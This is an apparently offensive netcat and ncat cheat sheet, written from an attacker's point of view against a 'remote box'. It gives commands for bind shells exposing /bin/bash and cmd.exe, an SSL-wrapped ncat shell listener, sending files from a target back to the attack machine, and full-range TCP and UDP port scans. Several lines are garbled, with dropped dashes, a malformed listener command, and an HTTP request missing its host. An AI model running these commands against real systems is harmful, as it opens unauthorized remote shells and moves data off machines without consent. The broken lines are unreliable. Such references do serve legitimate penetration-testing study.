Shells and Files

Stage a listener, using verbose on attack machine

Nc -nvlp <IP> <Port>

Connect from remote box back to attack machine

Nc <IP> <Port>

To receive file on attack box

nc -l -p <Port> > out.file

Send a file from box

nc -w 3 <IP> <Port> < out.file

Setup a BIND Shell on box


nc -v -e '/bin/bash' -l -p <Port> -t


nc l p <Port> e "c:\windows\system32\cmd.exe"

Then telnet or nc to port <Port> from attack system to get the shell.

Network Utilities

Using netcat to make an HTTP request

echo -e "GET HTTP/1.0nn" | nc -w 5 80

Making a one-page webserver; this will feed homepage.txt to all comers.

cat homepage.txt | nc -v -l -p 80

Check a udp port

Nc -vu <IP> <Port>

Scan UDP ports

nc -vzu <IP> 1-65535

To scan TCP ports simply remove the -u

nc -vz <IP> 1-65535


Make a secure shell listener (windows bind to cmd.exe, linux to /bin/sh)

ncat --exec cmd.exe --allow -vnl 4444 --ssl

Secure shell connector

ncat -v 4444 --ssl